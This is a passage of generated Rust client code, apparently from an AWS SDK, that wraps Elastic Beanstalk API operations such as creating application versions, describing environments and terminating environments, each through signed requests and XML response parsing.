You can create an application version from a source bundle in Amazon S3, a commit in AWS CodeCommit, or the output of an AWS CodeBuild build as follows:</p> <p>Specify a commit in an AWS CodeCommit repository with <code>SourceBuildInformation</code>.</p> <p>Specify a build in AWS CodeBuild with <code>SourceBuildInformation</code> and <code>BuildConfiguration</code>.</p> <p>Specify a source bundle in S3 with <code>SourceBundle</code>.</p> <p>Omit both <code>SourceBuildInformation</code> and <code>SourceBundle</code> to use the default sample application.</p> <note> <p>Once you create an application version with a specified Amazon S3 bucket and key location, you cannot change that Amazon S3 location. If you change the Amazon S3 location, you receive an exception when you attempt to launch an environment from the application version.</p> </note>"] fn create_application_version(&self, input: &CreateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, CreateApplicationVersionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateApplicationVersion"); params.put("Version", "2010-12-01"); CreateApplicationVersionMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationVersionDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationVersionDescriptionMessageDeserializer::deserialize("CreateApplicationVersionResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateApplicationVersionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Creates a configuration template. 
Templates are associated with a specific application and are used to deploy different versions of the application with the same configuration settings.</p> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> <li> <p> <a>DescribeConfigurationSettings</a> </p> </li> <li> <p> <a>ListAvailableSolutionStacks</a> </p> </li> </ul>"] fn create_configuration_template(&self, input: &CreateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, CreateConfigurationTemplateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateConfigurationTemplate"); params.put("Version", "2010-12-01"); CreateConfigurationTemplateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsDescriptionDeserializer::deserialize("CreateConfigurationTemplateResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateConfigurationTemplateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Launches an environment for the specified application using the specified configuration.</p>"] fn create_environment(&self, input: &CreateEnvironmentMessage) -> Result<EnvironmentDescription, CreateEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateEnvironment"); params.put("Version", "2010-12-01"); CreateEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionDeserializer::deserialize("CreateEnvironmentResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Creates the Amazon S3 storage location for the account.</p> <p>This location is used to store user log files.</p>"] fn create_storage_location(&self) -> Result<CreateStorageLocationResultMessage, CreateStorageLocationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateStorageLocation"); 
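        // Elastic Beanstalk speaks the AWS Query protocol: every operation in this
        // client is a signed POST to "/" that selects its behavior through the
        // "Action" and "Version" form parameters rather than through the URL path.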
params.put("Version", "2010-12-01"); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = CreateStorageLocationResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(CreateStorageLocationResultMessageDeserializer::deserialize("CreateStorageLocationResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateStorageLocationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the specified application along with all associated versions and configurations. The application versions will not be deleted from your Amazon S3 bucket.</p> <note> <p>You cannot delete an application that has a running environment.</p> </note>"] fn delete_application(&self, input: &DeleteApplicationMessage) -> Result<(), DeleteApplicationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteApplication"); params.put("Version", "2010-12-01"); DeleteApplicationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteApplicationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the specified version from the specified application.</p> <note> <p>You cannot delete an application version that is associated with a running environment.</p> </note>"] fn delete_application_version(&self, input: &DeleteApplicationVersionMessage) -> Result<(), DeleteApplicationVersionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteApplicationVersion"); params.put("Version", "2010-12-01"); DeleteApplicationVersionMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteApplicationVersionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the specified configuration template.</p> <note> <p>When you launch an environment using a configuration template, the environment gets a copy of the template. 
You can delete or modify the environment's copy of the template without affecting the running environment.</p> </note>"] fn delete_configuration_template(&self, input: &DeleteConfigurationTemplateMessage) -> Result<(), DeleteConfigurationTemplateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteConfigurationTemplate"); params.put("Version", "2010-12-01"); DeleteConfigurationTemplateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteConfigurationTemplateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the draft configuration associated with the running environment.</p> <p>Updating a running environment with any configuration changes creates a draft configuration set. You can get the draft configuration using <a>DescribeConfigurationSettings</a> while the update is in progress or if the update fails. The <code>DeploymentStatus</code> for the draft configuration indicates whether the deployment is in process or has failed. The draft configuration remains in existence until it is deleted with this action.</p>"] fn delete_environment_configuration(&self, input: &DeleteEnvironmentConfigurationMessage) -> Result<(), DeleteEnvironmentConfigurationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteEnvironmentConfiguration"); params.put("Version", "2010-12-01"); DeleteEnvironmentConfigurationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteEnvironmentConfigurationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Retrieve a list of application versions.</p>"] fn describe_application_versions(&self, input: &DescribeApplicationVersionsMessage) -> Result<ApplicationVersionDescriptionsMessage, DescribeApplicationVersionsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeApplicationVersions"); params.put("Version", "2010-12-01"); DescribeApplicationVersionsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationVersionDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationVersionDescriptionsMessageDeserializer::deserialize("DescribeApplicationVersionsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { 
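                // Any status other than 200 OK is converted into a typed error
                // by parsing the XML error document in the response body.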
Err(DescribeApplicationVersionsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns the descriptions of existing applications.</p>"] fn describe_applications(&self, input: &DescribeApplicationsMessage) -> Result<ApplicationDescriptionsMessage, DescribeApplicationsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeApplications"); params.put("Version", "2010-12-01"); DescribeApplicationsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationDescriptionsMessageDeserializer::deserialize("DescribeApplicationsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeApplicationsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Describes the configuration options that are used in a particular configuration template or environment, or that a specified solution stack defines. The description includes the values of the options, their default values, and an indication of the required action on a running environment if an option value is changed.</p>"] fn describe_configuration_options(&self, input: &DescribeConfigurationOptionsMessage) -> Result<ConfigurationOptionsDescription, DescribeConfigurationOptionsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeConfigurationOptions"); params.put("Version", "2010-12-01"); DescribeConfigurationOptionsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationOptionsDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationOptionsDescriptionDeserializer::deserialize("DescribeConfigurationOptionsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeConfigurationOptionsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns a description of the settings for the specified configuration set, that is, either a configuration template or the configuration set associated with a running environment.</p> <p>When describing the settings for the configuration set associated with a running environment, it is possible to receive two 
sets of setting descriptions. One is the deployed configuration set, and the other is a draft configuration of an environment that is either in the process of deployment or that failed to deploy.</p> <p>Related Topics</p> <ul> <li> <p> <a>DeleteEnvironmentConfiguration</a> </p> </li> </ul>"] fn describe_configuration_settings(&self, input: &DescribeConfigurationSettingsMessage) -> Result<ConfigurationSettingsDescriptions, DescribeConfigurationSettingsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeConfigurationSettings"); params.put("Version", "2010-12-01"); DescribeConfigurationSettingsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsDescriptions::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsDescriptionsDeserializer::deserialize("DescribeConfigurationSettingsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeConfigurationSettingsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns information about the overall health of the specified environment. 
The <b>DescribeEnvironmentHealth</b> operation is only available with AWS Elastic Beanstalk Enhanced Health.</p>"] fn describe_environment_health(&self, input: &DescribeEnvironmentHealthRequest) -> Result<DescribeEnvironmentHealthResult, DescribeEnvironmentHealthError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentHealth"); params.put("Version", "2010-12-01"); DescribeEnvironmentHealthRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeEnvironmentHealthResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeEnvironmentHealthResultDeserializer::deserialize("DescribeEnvironmentHealthResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentHealthError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Lists an environment's completed and failed managed actions.</p>"] fn describe_environment_managed_action_history(&self, input: &DescribeEnvironmentManagedActionHistoryRequest) -> Result<DescribeEnvironmentManagedActionHistoryResult, DescribeEnvironmentManagedActionHistoryError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentManagedActionHistory"); params.put("Version", "2010-12-01"); DescribeEnvironmentManagedActionHistoryRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeEnvironmentManagedActionHistoryResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeEnvironmentManagedActionHistoryResultDeserializer::deserialize("DescribeEnvironmentManagedActionHistoryResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentManagedActionHistoryError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Lists an environment's upcoming and in-progress managed actions.</p>"] fn describe_environment_managed_actions(&self, input: &DescribeEnvironmentManagedActionsRequest) -> Result<DescribeEnvironmentManagedActionsResult, DescribeEnvironmentManagedActionsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentManagedActions"); params.put("Version", 
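        // Every operation in this generated client pins the same Elastic
        // Beanstalk API version, 2010-12-01.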
"2010-12-01"); DescribeEnvironmentManagedActionsRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeEnvironmentManagedActionsResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeEnvironmentManagedActionsResultDeserializer::deserialize("DescribeEnvironmentManagedActionsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentManagedActionsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns AWS resources for this environment.</p>"] fn describe_environment_resources(&self, input: &DescribeEnvironmentResourcesMessage) -> Result<EnvironmentResourceDescriptionsMessage, DescribeEnvironmentResourcesError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentResources"); params.put("Version", "2010-12-01"); DescribeEnvironmentResourcesMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentResourceDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentResourceDescriptionsMessageDeserializer::deserialize("DescribeEnvironmentResourcesResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentResourcesError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns descriptions for existing environments.</p>"] fn describe_environments(&self, input: &DescribeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, DescribeEnvironmentsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironments"); params.put("Version", "2010-12-01"); DescribeEnvironmentsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = 
try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionsMessageDeserializer::deserialize("DescribeEnvironmentsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns a list of event descriptions matching criteria up to the last 6 weeks.</p> <note> <p>This action returns the most recent 1,000 events from the specified <code>NextToken</code>.</p> </note>"] fn describe_events(&self, input: &DescribeEventsMessage) -> Result<EventDescriptionsMessage, DescribeEventsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEvents"); params.put("Version", "2010-12-01"); DescribeEventsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EventDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EventDescriptionsMessageDeserializer::deserialize("DescribeEventsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEventsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Retrieves detailed information about the health of instances in your AWS Elastic Beanstalk environment. 
This operation requires <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced.html\">enhanced health reporting</a>.</p>"] fn describe_instances_health(&self, input: &DescribeInstancesHealthRequest) -> Result<DescribeInstancesHealthResult, DescribeInstancesHealthError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeInstancesHealth"); params.put("Version", "2010-12-01"); DescribeInstancesHealthRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeInstancesHealthResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeInstancesHealthResultDeserializer::deserialize("DescribeInstancesHealthResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeInstancesHealthError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns a list of the available solution stack names.</p>"] fn list_available_solution_stacks(&self) -> Result<ListAvailableSolutionStacksResultMessage, ListAvailableSolutionStacksError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ListAvailableSolutionStacks"); params.put("Version", "2010-12-01"); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ListAvailableSolutionStacksResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ListAvailableSolutionStacksResultMessageDeserializer::deserialize("ListAvailableSolutionStacksResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ListAvailableSolutionStacksError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes and recreates all of the AWS resources (for example: the Auto Scaling group, load balancer, etc.) 
for a specified environment and forces a restart.</p>"] fn rebuild_environment(&self, input: &RebuildEnvironmentMessage) -> Result<(), RebuildEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RebuildEnvironment"); params.put("Version", "2010-12-01"); RebuildEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(RebuildEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Initiates a request to compile the specified type of information of the deployed environment.</p> <p> Setting the <code>InfoType</code> to <code>tail</code> compiles the last lines from the application server log files of every Amazon EC2 instance in your environment. </p> <p> Setting the <code>InfoType</code> to <code>bundle</code> compresses the application server log files for every Amazon EC2 instance into a <code>.zip</code> file. Legacy and .NET containers do not support bundle logs. </p> <p> Use <a>RetrieveEnvironmentInfo</a> to obtain the set of logs. </p> <p>Related Topics</p> <ul> <li> <p> <a>RetrieveEnvironmentInfo</a> </p> </li> </ul>"] fn request_environment_info(&self, input: &RequestEnvironmentInfoMessage) -> Result<(), RequestEnvironmentInfoError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RequestEnvironmentInfo"); params.put("Version", "2010-12-01"); RequestEnvironmentInfoMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(RequestEnvironmentInfoError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Causes the environment to restart the application container server running on each Amazon EC2 instance.</p>"] fn restart_app_server(&self, input: &RestartAppServerMessage) -> Result<(), RestartAppServerError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RestartAppServer"); params.put("Version", "2010-12-01"); RestartAppServerMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(RestartAppServerError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Retrieves the compiled information from a <a>RequestEnvironmentInfo</a> request.</p> <p>Related Topics</p> <ul> <li> <p> <a>RequestEnvironmentInfo</a> </p> </li> </ul>"] fn retrieve_environment_info(&self, input: &RetrieveEnvironmentInfoMessage) -> Result<RetrieveEnvironmentInfoResultMessage, RetrieveEnvironmentInfoError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RetrieveEnvironmentInfo"); params.put("Version", "2010-12-01"); RetrieveEnvironmentInfoMessageSerializer::serialize(&mut 
params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = RetrieveEnvironmentInfoResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(RetrieveEnvironmentInfoResultMessageDeserializer::deserialize("RetrieveEnvironmentInfoResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(RetrieveEnvironmentInfoError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Swaps the CNAMEs of two environments.</p>"] fn swap_environment_cnam_es(&self, input: &SwapEnvironmentCNAMEsMessage) -> Result<(), SwapEnvironmentCNAMEsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "SwapEnvironmentCNAMEs"); params.put("Version", "2010-12-01"); SwapEnvironmentCNAMEsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(SwapEnvironmentCNAMEsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Terminates the specified environment.</p>"] fn terminate_environment(&self, input: &TerminateEnvironmentMessage) -> Result<EnvironmentDescription, TerminateEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "TerminateEnvironment"); params.put("Version", "2010-12-01"); TerminateEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionDeserializer::deserialize("TerminateEnvironmentResult", &mut stack)); skip_tree(&mut 